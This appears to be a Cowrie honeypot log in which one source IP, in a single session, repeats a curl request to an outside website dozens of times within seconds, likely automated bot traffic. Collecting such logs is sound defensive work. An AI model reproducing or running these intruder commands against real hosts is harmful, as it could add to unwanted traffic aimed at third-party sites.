{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.273959Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.275200Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.312279Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.313039Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.349605Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.350593Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.387595Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.388633Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.435479Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.436528Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.477887Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.478774Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.515618Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.516376Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.553405Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.554437Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.591357Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.592309Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.630577Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.631649Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.669387Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.670412Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.707640Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.708753Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.745867Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.746733Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.784155Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.785157Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.822541Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.823910Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.863591Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.864439Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.902151Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.903160Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.941403Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.942248Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.978868Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.979874Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.017055Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.018367Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.056343Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.057485Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.094352Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.095514Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.135205Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.136325Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.173829Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.174942Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.212252Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.213360Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.252054Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.253375Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.293556Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.294373Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.333869Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.334819Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.371677Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.372961Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.453346Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.454169Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.491266Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.492032Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.528679Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.529467Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.568439Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.569388Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.606906Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.607803Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.644629Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.645503Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.685046Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.686081Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.723360Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.724522Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.761065Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.761971Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.799973Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.800889Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.837878Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.839062Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.876149Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.877175Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.915210Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.916187Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.956108Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.957254Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:41.993657Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:41.994541Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.033878Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.034848Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.076697Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.077610Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.115515Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.116431Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.153592Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.154589Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.191418Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.192386Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.229194Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.230145Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.267128Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.268681Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.305355Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.306283Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.342840Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.343722Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.380751Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.381912Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.419067Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.419973Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.465414Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.466343Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.503284Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.504162Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.542135Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.543041Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.582211Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.583180Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.868073Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.869044Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.907588Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.908607Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.947312Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.948467Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:42.985274Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:42.986031Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.024676Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.025609Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.065729Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
